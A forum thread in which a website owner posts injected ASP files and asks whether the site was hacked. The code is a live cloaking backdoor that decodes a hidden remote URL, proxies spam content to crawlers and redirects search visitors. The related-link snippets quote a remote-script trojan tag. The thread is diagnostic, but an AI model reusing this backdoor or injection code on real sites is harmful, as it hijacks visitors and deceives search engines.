0 0

请高手看下,这段代码,是不是被挂马了3

网站的一个目录下出现一些文件0index.asp,1index.asp~10index.asp,aindex.asp~zindex.asp,内容都是这些!!奇怪,不知道干吗用的。是不是被挂马了?急。。。多谢!
<%function spiderbot()

    spiderbot = False

    dim agent: agent = lcase(request.servervariables("http_user_agent"))

    Dim tm, tms

    dim Bot: Bot = ""

    if instr(agent, "googlebot") > 0 then Bot = "Google"

    if instr(agent, "baiduspider") > 0 then Bot = "Baidu"

    If  len(Bot) > 0 Then

        spiderbot = True

    Else

        spiderbot = False

    End If

end Function

Dim megeturl78a, megotourl78a, wurl78a

Function jiem(str)

Dim key, s , i

jstr = ""

For i = 1 To Len(str)

key = Mid(str, i, 1)

If Asc(key) > &H2F And Asc(key) < &H47 Then

       s = s & key



      If Len(s) = 2 And CLng("&H" & s) < 127 Then



      jstr = jstr & Chr(CLng("&H" & s))

      s = "": key = ""

      ElseIf Len(s) = 4 Then

      jstr = jstr & Chr(clng("&H" & s))

      s = "": key = ""

      End If

End If

Next

jiem = jstr

End Function

serverurl =Request("url")

If Application("meUrl78a") = "" Or Application("meDrl78a")= "" Or datediff("s",Application("time"),Now())>3600 Then

Application("time") = Now()

wurl78a= jiem("687474703A2F2F642E6E6966656E672E696E666F2F64697A6869322E747874")

webarray78a=split(jiem(GetURL(wurl78a)),"$$")

Application("meUrl78a")  = webarray78a(0) 'c

Application("meDrl78a")  =webarray78a(1)'t

End If



domain78a = Application("meUrl78a")

gotourl78a = Application("meDrl78a")





dim SpiderList

SpiderList="Baidu|Google|gougou|soso|youdao|yahoo|sogou"

Function IsSpider

ValidEntry=false

SpiderListArr=Split(SpiderList,"|")

for i=0 to Ubound (SpiderListArr)

If InStr(lcase(Request.ServerVariables("HTTP_USER_AGENT")),lcase(SpiderListArr(i))) > 0 then

ValidEntry = True

exit for

end if

next

IsSpider=ValidEntry

End Function

Function CheckRefresh

ValidEntry=false

SpiderListArr=Split(SpiderList,"|")

for i=0 to Ubound (SpiderListArr)

If InStr(lcase(Request.ServerVariables("HTTP_REFERER")) ,lcase(SpiderListArr(i))) > 0 then

ValidEntry = True

exit for

end if

next

CheckRefresh=ValidEntry

End Function

if not IsSpider then

if CheckRefresh then

Response.Redirect gotourl78a

response.end

else

end if

end if

url1=Request.ServerVariables("HTTP_url")

if instr(url1,"?")>0 then

url2=split(url1,"?")

url=url2(1)

end if

sendurl =domain78a&"?"&url

cont=GetURL(sendurl)

cont=replace(cont,"href=""","href=""?")

cont=replace(cont,"charset=utf-8","charset=gb2312")

response.Write cont

Function BytesToBstr(body,Cset)

dim objstream

set objstream = Server.CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function

Function GetURL(url)

set xmlhttp = CreateObject("MSXML2.ServerXMLHTTP")

xmlhttp.open "GET", url, false

xmlhttp.setRequestHeader "User-Agent", "Googlebot/2.1 (+ http://www.baiduspider.com/bot.html;banni MSIE 60; Windows NT 5.1; SV1; .RINIMABI CLR 2.0.50727)"

xmlhttp.send

GetURL=BytesToBstr(xmlhttp.responsebody,"utf-8")

set xmlhttp = nothing

End Function

function Randsub(numtotal)

Randomize

Randsub = int((numtotal-1+1)*rnd+1)

end Function

%>
2011年11月07日 11:11

1个答案 按时间排序 按投票排序

0 0

那些代码如果不是自己人写的,那服务器肯定是让别人入侵了。

那些代码的主要功能是冒充 http://www.baiduspider.com/bot.html 向指定的URL发请求,然后返回那些数据给用户。具体是什么URL不好确定。Request.ServerVariables("HTTP_url")

赶紧叫管理员修复系统漏洞吧。

2011年11月07日 14:36

相关推荐

    挂马代码 10个挂马代码

    10个挂马代码10个挂马代码10个挂马代码

    网页多种挂马代码,JS

    ### 网页挂马代码分析 #### 一、IFrame挂马技术 **知识点:** 1. **IFrame的基本用途与挂马原理** - IFrame(Inline Frame)是HTML文档中的一个内联框架,它允许在当前页面内嵌入另一个页面。 - 挂马原理在于...

    挂马代码大全

    ### 挂马代码大全解析 #### 一、框架挂马(IFrame挂马) **原理:** 通过在网页中嵌入一个不可见的`&lt;iframe&gt;`元素,并将其`src`属性指向包含恶意代码的URL地址,使得用户访问网页时会加载并执行该恶意代码。 **...

    网页挂马代码:X利用方式

    网页挂马是指攻击者通过篡改或在合法网站上植入恶意代码,当用户访问这些被篡改的网页时,恶意代码会在用户的计算机上自动执行,导致用户的系统被感染病毒、木马等恶意程序的行为。网页挂马是一种常见的网络攻击手段...

    JS文件挂马代码分析

    通过对这段挂马代码的分析可以看出,攻击者通过复杂的混淆手段试图逃避检测,并利用了cookie机制来控制恶意代码的执行。为了防御此类攻击,建议采取以下措施: - **定期更新浏览器和安全插件**:确保所有系统组件都...

    sql server数据库中内容被挂马清除工具

    标题中的“sql server数据库中内容被挂马清除工具”指的是针对SQL Server数据库的恶意代码清除软件,这类软件设计用于检测并移除数据库中可能存在的木马、病毒或黑客植入的非法链接。在网络安全中,"挂马"是指黑客...

    asp网站挂马检测 检测网站是否被挂马

    asp网站挂马检测 检测网站是否被挂马 一个ASP写的程序

    ASP.Net网站数据库被挂马后手动清除一例

    ASP.NET网站数据库被挂马是一种常见的网络安全问题,它通常发生在网站遭受恶意攻击后,攻击者在网站的数据库或代码中植入恶意脚本,以获取敏感信息、控制服务器或利用网站进行其他非法活动。本文将详细讲解如何手动...

    网站被挂马的解决办法

    ### 网站被挂马的解决办法:Mdcsoft-ips软件的应用及特性解析 在互联网时代,网站安全已成为不容忽视的重要议题。网站被挂马不仅会损害网站的正常运营,还会对用户的个人信息安全构成严重威胁。面对这类安全挑战,...

    数据库被挂马的解决办法

    在当前网络环境下,数据库安全问题日益严峻,其中数据库被挂马(即被植入恶意代码或木马程序)是一种常见的威胁。一旦数据库被挂马,不仅可能导致数据泄露、丢失,还可能进一步危害到整个系统的安全。本文将详细介绍...

    超级短的网络挂马

    一款超级段的 挂马代码 简单 好用 是在 你们看就行了

    网页挂马清理

    网页挂马清理是网络安全领域中的一个重要话题,主要指的是检测并清除网页中隐藏的恶意代码,这些代码通常由黑客植入,用于在用户访问受感染的网页时悄悄地在用户的计算机上安装恶意软件。"木马守护神 罩页挂马清理...

    css防挂马

    这些技术通常会针对`&lt;iframe&gt;`和`&lt;script&gt;`标签进行特别处理,因为这两种标签是挂马攻击中最常被利用的对象。具体来说,可以通过以下几种方式来实现: 1. **阻止外部脚本加载**:通过修改`&lt;script&gt;`标签的行为,...

    网站挂马检测器

    大家是否在为网站有漏洞、网站被挂马而不知道所头疼?大家是否在为网站的安全、是否会被人入侵所担忧? MHTSoft推出了“门户通网站挂马检测器”,从此不再让您担忧!您只需轻按键盘、轻点鼠标,就可以实现对整个目录...

    挂马网站分析追溯技术与实践

    挂马网站是指那些被恶意植入代码,利用访问者的计算机安全漏洞来传播恶意软件的网站。这类网站已成为网络安全威胁的重要来源,对个人用户和企业都构成了严重风险。 ### 挂马网站的安全威胁背景与发展历程 挂马网站...

    挂马的各种方式

    挂马是一种常见的网络攻击手段,通过在网站上植入恶意代码,使访问者在不知情的情况下受到感染。以下将从不同的技术角度来探讨这些挂马方法。 ### 1. iframe 嵌入 这种方法是最常见的一种挂马手段之一。通过在网页...

    网站挂马文本

    例如,下面这段代码通过加载远程文件`muma.txt`来实现挂马行为: ```html &lt;script language="JScript.Encode" src=http://www.upx.com.cn/muma.txt&gt;&lt;/script&gt; ``` 这段代码的作用是从指定URL(`...

    网页挂马分析专家 MDecoder

    这款软件的主要功能在于检测和分析网页是否遭受了挂马攻击,即不法分子通过在网页中嵌入恶意代码,来控制或者窃取用户的计算机资源或数据。 MDecoder的工作原理是通过自动化的方式对网页内容进行解密和深度分析。它...

Global site tag (gtag.js) - Google Analytics